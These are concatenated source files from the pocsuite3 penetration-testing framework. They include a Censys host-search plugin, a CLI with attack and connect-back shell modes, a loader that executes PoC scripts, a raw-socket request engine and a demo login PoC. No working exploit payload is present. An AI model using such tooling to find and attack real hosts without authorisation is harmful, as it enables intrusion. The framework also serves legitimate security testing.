    _set_connect_back()
    _set_network_proxy()
    _set_network_timeout()
    _set_threads()
    _set_listener()
    remove_extra_log_message()
    if conf.requests_session_reuse:
        _set_session_queue()



import time
import getpass
from configparser import ConfigParser
from pocsuite3.lib.core.data import paths, logger
from pocsuite3.lib.core.common import is_ipv6_address_format
from pocsuite3.api import requests


class Censys():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, uid='', secret=''):
        self.headers = {'User-Agent': 'curl/7.80.0', 'Accept': 'application/json'}
        self.uid = uid
        self.secret = secret
        self.conf_path = conf_path
        self.credits = 0
        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.uid = self.uid or self.parser.get("Censys", "uid")
                self.secret = self.secret or self.parser.get("Censys", "secret")
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.secret and self.uid:
            try:
                resp = requests.get("https://search.censys.io/api/v1/account", auth=(self.uid, self.secret),
                                    headers=self.headers)
                if resp.status_code == 200 and 'allowance' in resp.text:
                    js = resp.json()
                    logger.info("[PLUGIN] Censys login success, email: {}".format(js["email"]))
                    self.credits = js["quota"]["allowance"] - js["quota"]["used"]
                    return True
                else:
                    logger.info(resp.text)
            except Exception as ex:
                logger.error(ex)
        return False

    def check_token(self):
        if self.token_is_available():
            return True
        while True:
            new_UID = input("Censys API ID: ")
            new_secret = getpass.getpass("Censys API SECRET: (input will hidden)")
            self.uid = new_UID
            self.secret = new_secret
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The censys api id or secret are incorrect, Please enter a correct one.")

    def write_conf(self):
        if not self.parser.has_section("Censys"):
            self.parser.add_section("Censys")
        try:
            self.parser.set("Censys", "secret", self.secret)
            self.parser.set("Censys", "uid", self.uid)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def search(self, dork, pages=1, resource='ipv4'):
        search_result = set()
        try:
            cursor = ''
            for page in range(1, pages + 1):
                time.sleep(1)
                url = "https://search.censys.io/api/v2/hosts/search"
                data = {
                    "q": dork,  # Search keywords
                    "per_page": 50,
                    "virtual_hosts": "EXCLUDE"
                }
                if cursor:
                    data['cursor'] = cursor
                resp = requests.get(url, params=data, auth=(self.uid, self.secret),
                                    headers=self.headers, timeout=60)
                if resp and resp.status_code == 200 and 'result' in resp.json():
                    results = resp.json()['result']['hits']
                    cursor = resp.json()['result']['links']['next']
                    for i in results:
                        ip = i['ip']
                        if is_ipv6_address_format(ip):
                            ip = f'[{ip}]'
                        for j in i['services']:
                            port = j['port']
                            scheme = j['service_name'].lower()
                            search_result.add(f'{scheme}://{ip}:{port}' if scheme else f'{ip}:{port}')
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == '__main__':
    c = Censys()
    ret = c.search("thinkphp", pages=2)
    for i in ret:
        print(i)



import argparse
import os
import sys

from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.settings import IS_WIN, CMD_PARSE_WHITELIST

DIY_OPTIONS = []


def cmd_line_parser(argv=None):
    """
    This function parses the command line parameters and arguments
    """

    if not argv:
        argv = sys.argv

    _ = os.path.basename(argv[0])
    usage = "pocsuite [options]"
    parser = argparse.ArgumentParser(prog='Pocsuite3', usage=usage)
    try:
        parser.add_argument("--version", dest="show_version", action="store_true",
                            help="Show program's version number and exit")

        parser.add_argument("--update", dest="update_all", action="store_true",
                            help="Update Pocsuite3")

        parser.add_argument("-n", "--new", dest="new", action="store_true", help="Create a PoC template")

        parser.add_argument("-v", dest="verbose", type=int, default=1, choices=list(range(7)),
                            help="Verbosity level: 0-6 (default 1)")

        # Target options
        target = parser.add_argument_group('Target', "At least one of these "
                                                     "options has to be provided to define the target(s)")
        target.add_argument("-u", "--url", dest="url", nargs='+',
                            help="Target URL/CIDR (e.g. \"http://www.site.com/vuln.php?id=1\")")

        target.add_argument("-f", "--file", dest="url_file",
                            help="Scan multiple targets given in a textual file (one per line)")
        target.add_argument("-p", "--ports", dest="ports",
                            help="add additional port to each target ([proto:]port, e.g. 8080,https:10000)")
        target.add_argument("-s", dest="skip_target_port", action="store_true",
                            help="Skip target's port, only use additional port")
        target.add_argument("-r", dest="poc", nargs='+', help="Load PoC file from local or remote from seebug website")
        target.add_argument("-k", dest="poc_keyword", help="Filter PoC by keyword, e.g. ecshop")
        target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file")
        target.add_argument("-l", dest="poc_list", action="store_true", help="Show all PoC file from local")

        # Mode options
        mode = parser.add_argument_group("Mode", "Pocsuite running mode options")

        mode.add_argument("--verify", dest="mode", default='verify', action="store_const", const='verify',
                          help="Run poc with verify mode")

        mode.add_argument("--attack", dest="mode", action="store_const", const='attack',
                          help="Run poc with attack mode")
        mode.add_argument("--shell", dest="mode", action="store_const", const='shell',
                          help="Run poc with shell mode")
        # Requests options
        request = parser.add_argument_group("Request", "Network request options")
        request.add_argument("--cookie", dest="cookie", help="HTTP Cookie header value")
        request.add_argument("--host", dest="host", help="HTTP Host header value")
        request.add_argument("--referer", dest="referer", help="HTTP Referer header value")
        request.add_argument("--user-agent", dest="agent", help="HTTP User-Agent header value (default random)")
        request.add_argument("--proxy", dest="proxy",
                             help="Use a proxy to connect to the target URL (protocol://host:port)")
        request.add_argument("--proxy-cred", dest="proxy_cred", help="Proxy authentication credentials (name:password)")
        request.add_argument("--timeout", dest="timeout", type=float, default=10,
                             help="Seconds to wait before timeout connection (default 10)")
        request.add_argument("--retry", dest="retry", type=int, default=0, help="Time out retrials times (default 0)")
        request.add_argument("--delay", dest="delay", help="Delay between two request of one thread")
        request.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"key1: value1\\nkey2: value2\")")
        request.add_argument("--http-debug", dest="http_debug", type=int, default=0, help="HTTP debug level (default 0)")
        request.add_argument("--session-reuse", dest="requests_session_reuse", action="store_true",
                             help="Enable requests session reuse")
        request.add_argument("--session-reuse-num", type=int, dest="requests_session_reuse_num", default=10,
                             help="Requests session reuse number")

        # Account options
        group = parser.add_argument_group("Account", "Account options")
        group.add_argument("--ceye-token", dest="ceye_token", help="CEye token")
        group.add_argument("--oob-server", dest="oob_server",
                           help="Interactsh server to use (default \"interact.sh\")")
        group.add_argument("--oob-token", dest="oob_token",
                           help="Authentication token to connect protected interactsh server")
        group.add_argument("--seebug-token", dest="seebug_token", help="Seebug token")
        group.add_argument("--zoomeye-token", dest="zoomeye_token", help="ZoomEye token")
        group.add_argument("--shodan-token", dest="shodan_token", help="Shodan token")
        group.add_argument("--fofa-user", dest="fofa_user", help="Fofa user")
        group.add_argument("--fofa-token", dest="fofa_token", help="Fofa token")
        group.add_argument("--quake-token", dest="quake_token", help="Quake token")
        group.add_argument("--hunter-token", dest="hunter_token", help="Hunter token")
        group.add_argument("--censys-uid", dest="censys_uid", help="Censys uid")
        group.add_argument("--censys-secret", dest="censys_secret", help="Censys secret")
        # Modules options
        modules = parser.add_argument_group(
            "Modules", "Modules options")
        modules.add_argument("--dork", dest="dork", action="store", default=None,
                             help="Zoomeye dork used for search")
        modules.add_argument("--dork-zoomeye", dest="dork_zoomeye", action="store", default=None,
                             help="Zoomeye dork used for search")
        modules.add_argument("--dork-shodan", dest="dork_shodan", action="store", default=None,
                             help="Shodan dork used for search")
        modules.add_argument("--dork-fofa", dest="dork_fofa", action="store", default=None,
                             help="Fofa dork used for search")
        modules.add_argument("--dork-quake", dest="dork_quake", action="store", default=None,
                             help="Quake dork used for search")
        modules.add_argument("--dork-hunter", dest="dork_hunter", action="store", default=None,
                             help="Hunter dork used for search")
        modules.add_argument("--dork-censys", dest="dork_censys", action="store", default=None,
                             help="Censys dork used for search")
        modules.add_argument("--max-page", dest="max_page", type=int, default=1,
                             help="Max page used in search API")
        modules.add_argument("--page-size", dest="page_size", type=int, default=20,
                             help="Page size used in search API"
                             )
        modules.add_argument("--search-type", dest="search_type", action="store", default='v4',
                             help="search type used in search API, v4,v6 and web")
        modules.add_argument("--vul-keyword", dest="vul_keyword", action="store", default=None,
                             help="Seebug keyword used for search")
        modules.add_argument("--ssv-id", dest="ssvid", action="store", default=None,
                             help="Seebug SSVID number for target PoC")
        modules.add_argument("--lhost", dest="connect_back_host", action="store", default=None,
                             help="Connect back host for target PoC in shell mode")
        modules.add_argument("--lport", dest="connect_back_port", action="store", default=None,
                             help="Connect back port for target PoC in shell mode")
        modules.add_argument("--tls", dest="enable_tls_listener", action="store_true", default=False,
                             help="Enable TLS listener in shell mode")
        modules.add_argument("--comparison", dest="comparison", help="Compare popular web search engines",
                             action="store_true",
                             default=False)
        modules.add_argument("--dork-b64", dest="dork_b64", help="Whether dork is in base64 format",
                             action="store_true",
                             default=False)

        # Optimization options
        optimization = parser.add_argument_group("Optimization", "Optimization options")
        optimization.add_argument("-o", "--output", dest="output_path", help="Output file to write (JSON Lines format)")
        optimization.add_argument("--plugins", dest="plugins", action="store", default=None,
                                  help="Load plugins to execute")
        optimization.add_argument("--pocs-path", dest="pocs_path", action="store", default=None,
                                  help="User defined poc scripts path")
        optimization.add_argument("--threads", dest="threads", type=int, default=150,
                                  help="Max number of concurrent network requests (default 150)")
        optimization.add_argument("--batch", dest="batch",
                                  help="Automatically choose defaut choice without asking")
        optimization.add_argument("--requires", dest="check_requires", action="store_true", default=False,
                                  help="Check install_requires")
        optimization.add_argument("--quiet", dest="quiet", action="store_true", default=False,
                                  help="Activate quiet mode, working without logger")
        optimization.add_argument("--ppt", dest="ppt", action="store_true", default=False,
                                  help="Hiden sensitive information when published to the network")
        optimization.add_argument("--pcap", dest="pcap", action="store_true", default=False,
                                  help="use scapy capture flow")
        optimization.add_argument("--rule", dest="rule", action="store_true", default=False,
                                  help="export suricata rules, default export reqeust and response")
        optimization.add_argument("--rule-req", dest="rule_req", action="store_true", default=False,
                                  help="only export request rule")
        optimization.add_argument("--rule-filename", dest="rule_filename", action="store", default=False,
                                  help="Specify the name of the export rule file")
        optimization.add_argument("--no-check", dest="no_check", action="store_true", default=False,
                                  help="Disable URL protocol correction and honeypot check")

        # docker options
        docker_environment = parser.add_argument_group("Docker Environment", "Docker Environment options")
        docker_environment.add_argument("--docker-start", dest="docker_start", action="store_true",
                                        default=False, help="Run the docker for PoC")
        docker_environment.add_argument("--docker-port", dest="docker_port", action="append",
                                        default=[], help="Publish a container's port(s) to the host")
        docker_environment.add_argument("--docker-volume", dest="docker_volume", action="append",
                                        default=[], help="Bind mount a volume")
        docker_environment.add_argument("--docker-env", dest="docker_env", action="append", default=[],
                                        help="Set environment variables")
        docker_environment.add_argument("--docker-only", dest="docker_only", action="store_true",
                                        default=False, help="Only run docker environment")

        # web hook options
        web_hook = parser.add_argument_group('Web Hook', "Web Hook Options")
        web_hook.add_argument("--dingtalk-token", dest="dingtalk_token", help="Dingtalk access token")
        web_hook.add_argument("--dingtalk-secret", dest="dingtalk_secret", help="Dingtalk secret")
        web_hook.add_argument("--wx-work-key", dest="wx_work_key", help="Weixin Work key")

        # Diy options
        diy = parser.add_argument_group("Poc options", "definition options for PoC")
        diy.add_argument("--options", dest="show_options", action="store_true", default=False,
                         help="Show all definition options")

        for line in argv:
            if line.startswith("--"):
                if line[2:] not in CMD_PARSE_WHITELIST:
                    diy.add_argument(line)

        args = parser.parse_args()
        return args

    except SystemExit:
        # Protection against Windows dummy double clicking
        if IS_WIN:
            data_to_stdout("\nPress Enter to continue...")
            input()
        raise



import re
from importlib import metadata
import importlib.machinery
import importlib.util
from importlib.abc import Loader
from pocsuite3.lib.core.common import (
    multiple_replace, get_filename, get_md5, get_file_text,
    is_pocsuite3_poc, get_poc_requires, get_poc_name)
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.settings import POC_IMPORTDICT


class PocLoader(Loader):
    def __init__(self, fullname, path):
        self.fullname = fullname
        self.path = path
        self.data = None

    def set_data(self, data):
        self.data = data

    def get_filename(self, fullname):
        return self.path

    def get_data(self, filename):
        if filename.startswith('pocsuite://') and self.data:
            if not is_pocsuite3_poc(self.data):
                data = multiple_replace(self.data, POC_IMPORTDICT)
            else:
                data = self.data
        else:
            code = get_file_text(filename)
            if not is_pocsuite3_poc(code):
                data = multiple_replace(code, POC_IMPORTDICT)
            else:
                data = code
        return data

    @staticmethod
    def check_requires(data):
        requires = get_poc_requires(data)
        requires = [i.strip().strip('"').strip("'") for i in requires.split(',')] if requires else ['']
        if requires[0]:
            poc_name = get_poc_name(data)
            info_msg = 'PoC script "{0}" requires "{1}" to be installed'.format(poc_name, ', '.join(requires))
            logger.info(info_msg)
            try:
                for r in requires:
                    r = r.replace(' ', '')
                    install_name, import_name = (r.split(':') + [''])[0:2]
                    t = re.split('>|<|=|~', install_name)
                    if len(t) > 1:
                        install_name = t[0]
                    if not import_name:
                        import_name = install_name
                    __import__(import_name)
                    try:
                        ver = metadata.version(install_name)
                    except Exception:
                        ver = 'unknown'
                    logger.info(f'{install_name}=={ver} has been installed')
            except ImportError:
                err_msg = f'{install_name} not found, try install with "python -m pip install {install_name}"'
                logger.error(err_msg)
                raise SystemExit

    def exec_module(self, module):
        filename = self.get_filename(self.fullname)
        poc_code = self.get_data(filename)

        # convert yaml template to pocsuite3 poc script
        if filename.endswith('.yaml') and re.search(r'matchers:\s+-', poc_code):
            from pocsuite3.lib.yaml.nuclei import Nuclei
            poc_code = str(Nuclei(poc_code))

        self.check_requires(poc_code)
        obj = compile(poc_code, filename, 'exec', dont_inherit=True, optimize=-1)
        try:
            exec(obj, module.__dict__)
        except Exception as err:
            logger.error("Poc: '{}' exec arise error: {} ".format(filename, err))


def load_file_to_module(file_path, module_name=None):
    if '' not in importlib.machinery.SOURCE_SUFFIXES:
        importlib.machinery.SOURCE_SUFFIXES.append('')
    try:
        module_name = 'pocs_{0}'.format(get_filename(file_path, with_ext=False)) if module_name is None else module_name
        spec = importlib.util.spec_from_file_location(module_name, file_path, loader=PocLoader(module_name, file_path))
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)
        poc_model = kb.registered_pocs[module_name]
    except KeyError:
        poc_model = None
    except ImportError:
        error_msg = "load module failed! '{}'".format(file_path)
        logger.error(error_msg)
        raise
    return poc_model


def load_string_to_module(code_string, fullname=None):
    try:
        module_name = 'pocs_{0}'.format(get_md5(code_string)) if fullname is None else fullname
        file_path = 'pocsuite://{0}'.format(module_name)
        poc_loader = PocLoader(module_name, file_path)
        poc_loader.set_data(code_string)
        spec = importlib.util.spec_from_file_location(module_name, file_path, loader=poc_loader)
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)
        poc_model = kb.registered_pocs[module_name]
    except KeyError:
        poc_model = None
    except ImportError:
        error_msg = "load module '{0}' failed!".format(fullname)
        logger.error(error_msg)
        raise
    return poc_model


def register_poc(poc_class):
    module = poc_class.__module__.split('.')[0]
    if module in kb.registered_pocs:
        kb.current_poc = kb.registered_pocs[module]
        return

    kb.registered_pocs[module] = poc_class()
    kb.current_poc = kb.registered_pocs[module]



import binascii
import json
import socket
import ssl
import time
from collections import OrderedDict
from dataclasses import dataclass, field
from typing import Union, List

from pocsuite3.lib.core.common import urlparse
from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.lib.yaml.nuclei.model import CaseInsensitiveEnum
from pocsuite3.lib.yaml.nuclei.operators import (Extractor, ExtractorType,
                                                 Matcher, MatcherType,
                                                 extract_dsl, extract_kval, extract_regex,
                                                 match_binary,
                                                 match_dsl, match_regex,
                                                 match_size, match_words, match_xpath)
from pocsuite3.lib.yaml.nuclei.protocols.common.generators import AttackType, payload_generator
from pocsuite3.lib.yaml.nuclei.protocols.common.interactsh import InteractshClient
from pocsuite3.lib.yaml.nuclei.protocols.common.replacer import (
    UNRESOLVED_VARIABLE, marker_replace)


class NetworkInputType(CaseInsensitiveEnum):
    HexType = 'hex'
    TextType = 'text'


@dataclass
class AddressKV:
    address: str = ''
    host: str = ''
    port: int = 0
    tls: bool = False


@dataclass
class Input:
    """Input is the input to send on the network
    """

    # Data is the data to send as the input.
    # It supports DSL Helper Functions as well as normal expressions.
    data: Union[str, int] = ''

    # Type is the type of input specified in `data` field.
    type: NetworkInputType = NetworkInputType.TextType

    # Read is the number of bytes to read from socket.
    read: int = 0

    # Name is the optional name of the data read to provide matching on.
    name: str = ''


@dataclass
class NetworkRequest:
    """NetworkRequest contains a Network protocol request to be made from a template
    """

    # Operators for the current request go here.
    matchers: List[Matcher] = field(default_factory=list)
    extractors: List[Extractor] = field(default_factory=list)
    matchers_condition: str = 'or'

    # Host to send network requests to.
    host: List[str] = field(default_factory=list)

    addresses: List[AddressKV] = field(default_factory=list)

    # ID is the optional id of the request
    id: str = ''

    # Attack is the type of payload combinations to perform.
    attack: AttackType = AttackType.BatteringRamAttack

    # Payloads contains any payloads for the current request.
    payloads: dict = field(default_factory=dict)

    # Inputs contains inputs for the network socket
    inputs: List[Input] = field(default_factory=list)

    # ReadSize is the size of response to read at the end, Default value for read-size is 1024.
    read_size: int = 1024

    # ReadAll determines if the data stream should be read till the end regardless of the size
    read_all: bool = False


def network_get_match_part(part: str, resp_data: dict, return_bytes: bool = False) -> str:
    result = ''
    if part in ['', 'all', 'body']:
        part = 'data'

    if part in resp_data:
        result = resp_data[part]

    if return_bytes and not isinstance(result, bytes):
        result = str(result).encode()
    elif not return_bytes and isinstance(result, bytes):
        try:
            result = result.decode()
        except UnicodeDecodeError:
            result = str(result)
    return result


def network_extract(request: NetworkRequest, resp_data: dict):
    extractors = request.extractors
    extractors_result = {'internal': {}, 'external': {}, 'extra_info': []}

    for extractor in extractors:
        item = network_get_match_part(extractor.part, resp_data)

        res = None
        if extractor.type == ExtractorType.RegexExtractor:
            res = extract_regex(extractor, item)
        elif extractor.type == ExtractorType.KValExtractor:
            try:
                item = json.loads(item)
            except json.JSONDecodeError:
                continue
            res = extract_kval(extractor, item)
        elif extractor.type == ExtractorType.DSLExtractor:
            res = extract_dsl(extractor, resp_data)

        logger.debug(f'[+] {extractor} -> {res}')
        extractors_result['internal'].update(res['internal'])
        extractors_result['external'].update(res['external'])
        extractors_result['extra_info'] += res['extra_info']
    return extractors_result


def network_match(request: NetworkRequest, resp_data: dict, interactsh=None):
    matchers = request.matchers
    matchers_result = []

    if 'interactsh_' in str(matchers) and isinstance(interactsh, InteractshClient):
        interactsh.poll()
        resp_data['interactsh_protocol'] = '\n'.join(interactsh.interactsh_protocol)
        resp_data['interactsh_request'] = '\n'.join(interactsh.interactsh_request)
        resp_data['interactsh_response'] = '\n'.join(interactsh.interactsh_response)
    else:
        resp_data['interactsh_protocol'] = ''
        resp_data['interactsh_request'] = ''
        resp_data['interactsh_response'] = ''

    for i, matcher in enumerate(matchers):
        matcher_res = False
        item = network_get_match_part(matcher.part, resp_data, matcher.type == MatcherType.BinaryMatcher)

        if matcher.type == MatcherType.SizeMatcher:
            matcher_res = match_size(matcher, len(item))

        elif matcher.type == MatcherType.WordsMatcher:
            matcher_res, _ = match_words(matcher, item, resp_data)

        elif matcher.type == MatcherType.RegexMatcher:
            matcher_res, _ = match_regex(matcher, item)

        elif matcher.type == MatcherType.BinaryMatcher:
            matcher_res, _ = match_binary(matcher, item)

        elif matcher.type == MatcherType.XpathMatcher:
            matcher_res, _ = match_xpath(matcher, item)

        elif matcher.type == MatcherType.DSLMatcher:
            matcher_res = match_dsl(matcher, resp_data)

        if matcher.negative:
            matcher_res = not matcher_res

        logger.debug(f'[+] {matcher} -> {matcher_res}')

        if not matcher_res:
            if request.matchers_condition == 'and':
                return False
            elif request.matchers_condition == 'or':
                continue

        if request.matchers_condition == 'or':
            return True

        matchers_result.append(matcher_res)

        if len(matchers) - 1 == i:
            return True

    return False


def network_request_generator(request: NetworkRequest, dynamic_values: OrderedDict):
    request_count = len(request.addresses)
    for payload_instance in payload_generator(request.payloads, request.attack):
        current_index = 0
        dynamic_values.update(payload_instance)
        for address in request.addresses:
            current_index += 1
            yield address, request.inputs, payload_instance, request_count, current_index


def execute_network_request(request: NetworkRequest, dynamic_values, interactsh) -> Union[bool, list]:
    results = []
    for h in request.host:
        use_tls = False
        if h.startswith('tls://'):
            use_tls = True
            h = h.replace('tls://', '')
        address = marker_replace(h, dynamic_values)
        host, port = urlparse(address).hostname, urlparse(address).port
        address = AddressKV(address=address, host=host, port=port, tls=use_tls)
        request.addresses.append(address)

    for (address, inputs, payload, request_count, current_index) in network_request_generator(request, dynamic_values):
        try:
            req_buf, resp_buf = [], []
            resp_data = {'host': address.address}
            s = socket.socket()
            s.connect((address.host, address.port))
            if address.tls:
                ssl.wrap_socket(s)
            for inp in inputs:
                data = marker_replace(inp.data, dynamic_values)
                if isinstance(data, int):
                    data = str(data)
                if inp.type == NetworkInputType.HexType:
                    data = binascii.unhexlify(data)
                elif not isinstance(data, bytes):
                    data = data.encode('utf-8')

                if inp.read > 0:
                    chunk = s.recv(inp.read)
                    resp_buf.append(chunk)
                    if inp.name:
                        resp_data[inp.name] = chunk

                req_buf.append(data)
                s.send(data)
                time.sleep(0.1)

            last_bytes = []
            if request.read_all:
                while True:
                    chunk = s.recv(1024)
                    if not chunk:
                        break
                    last_bytes.append(chunk)
            else:
                chunk = s.recv(request.read_size)
                last_bytes.append(chunk)

            # response to DSL Map
            resp_buf += last_bytes
            resp_data['request'] = b''.join(req_buf)
            resp_data['data'] = b''.join(last_bytes)
            resp_data['raw'] = b''.join(resp_buf)
            logger.debug(resp_data)

            extractor_res = network_extract(request, resp_data)

            for k, v in extractor_res['internal'].items():
                if v == UNRESOLVED_VARIABLE and k in dynamic_values:
                    continue
                else:
                    dynamic_values[k] = v

            resp_data.update(dynamic_values)
            match_res = network_match(request, resp_data, interactsh)
            if match_res:
                output = {}
                output.update(extractor_res['external'])
                output.update(payload)
                output['extra_info'] = extractor_res['extra_info']
                results.append(output)
                return results
        except Exception:
            import traceback
            traceback.print_exc()

    return False



from io import BytesIO
from docker import client
from docker import errors


from pocsuite3.lib.core.data import logger


class DockerEnv:

    def __init__(self):
        self.client = client.from_env()

    def build(self, name, docker_file):
        file_obj = BytesIO(docker_file.encode())
        try:
            logger.info("Building image...")
            build_info = self.client.images.build(fileobj=file_obj, tag=name)
            return build_info
        except errors.BuildError as e:
            logger.error(e)

    def run(self, tag_name, docker_file, ports, envs, volumes):
        try:
            # if image exists run
            self.client.images.get(tag_name)
            logger.info("Image {} exists".format(tag_name))
            run_info = self.client.containers.run(
                tag_name,
                detach=True,
                ports=ports,
                environment=envs,
                volumes=volumes
            )
            return run_info
        except errors.ImageNotFound:
            # if image not exists, build image first
            logger.info("Image {} does not exist".format(tag_name))
            build_info = self.build(tag_name, docker_file)
            if build_info[0].tags:
                run_info = self.client.containers.run(
                    tag_name,
                    detach=True,
                    ports=ports,
                    environment=envs,
                    volumes=volumes
                )
                return run_info


if __name__ == "__main__":
    docker_env = DockerEnv()
    ports = {"8080/tcp": '8899', '8090/tcp': ("127.0.0.1", 8890)}
    env = ["PORT=8899", "PORT=8890"]
    volumes = ["/tmp:/home"]
    dockerfile = "FROM ubuntu:latest"
    image_tag = "ubuntu:pocsuite"
    docker_env.run(
        image_tag,
        docker_file=dockerfile,
        ports=ports,
        envs=env,
        volumes=volumes
    )



from pocsuite3.lib.yaml.nuclei.operators.extrators import (Extractor,
                                                           ExtractorType,
                                                           extract_dsl,
                                                           extract_json,
                                                           extract_kval,
                                                           extract_regex,
                                                           extract_xpath)
from pocsuite3.lib.yaml.nuclei.operators.matchers import (Matcher, MatcherType,
                                                          match_binary,
                                                          match_dsl,
                                                          match_regex,
                                                          match_size,
                                                          match_status_code,
                                                          match_words,
                                                          match_xpath)

__all__ = [
    "ExtractorType",
    "Extractor",
    "extract_regex",
    "extract_kval",
    "extract_xpath",
    "extract_json",
    "extract_dsl",
    "Matcher",
    "MatcherType",
    "match_status_code",
    "match_size",
    "match_words",
    "match_regex",
    "match_binary",
    "match_dsl",
    "match_xpath",
]



from pocsuite3.lib.core.data import kb


class ReuseSession:
    def __init__(self):
        self.session_queue = kb.session_queue
        self.session = None

    def __enter__(self):
        self.session = self.session_queue.get()
        return self.session

    def __exit__(self, *args):
        self.session_queue.put(self.session)


def api_request(method, url, **kwargs):
    with ReuseSession() as session:
        return session.request(method=method, url=url, **kwargs)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time    : 2019/2/26 2:33 PM
# @Author  : chenghsm
# @File    : login_demo.py
# @Descript: 自定义命令参数登录例子

from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.api import OptString


class DemoPOC(POCBase):
    vulID = '00000'  # ssvid
    version = '1.0'
    author = ['chenghs']
    vulDate = '2019-2-26'
    createDate = '2019-2-26'
    updateDate = '2019-2-25'
    references = ['']
    name = '自定义命令参数登录例子'
    appPowerLink = 'http://www.knownsec.com/'
    appName = 'test'
    appVersion = 'test'
    vulType = 'demo'
    desc = '''这个例子说明了你可以使用console模式设置一些参数或者使用命令中的'--'来设置自定义的参数'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _options(self):
        o = OrderedDict()
        o["username"] = OptString('', description='这个poc需要用户登录，请输入登录账号', require=True)
        o["password"] = OptString('', description='这个poc需要用户密码，请输出用户密码', require=False)
        return o

    def _verify(self):
        result = {}
        payload = "username={0}&password={1}".format(self.get_option("username"), self.get_option("password"))
        r = requests.post(self.url, data=payload)
        if r.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Postdata'] = payload

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
